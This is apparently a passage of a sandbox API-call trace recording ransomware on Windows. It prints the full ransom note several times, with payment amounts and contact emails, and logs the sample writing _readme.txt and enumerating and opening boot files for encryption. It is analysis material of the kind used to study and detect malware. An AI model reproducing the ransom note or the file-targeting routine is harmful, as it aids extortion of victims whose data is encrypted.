key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.475] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.475] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.476] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.476] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.476] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0201.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.476] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned=".mui" [0201.476] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.477] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.477] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.477] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.477] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 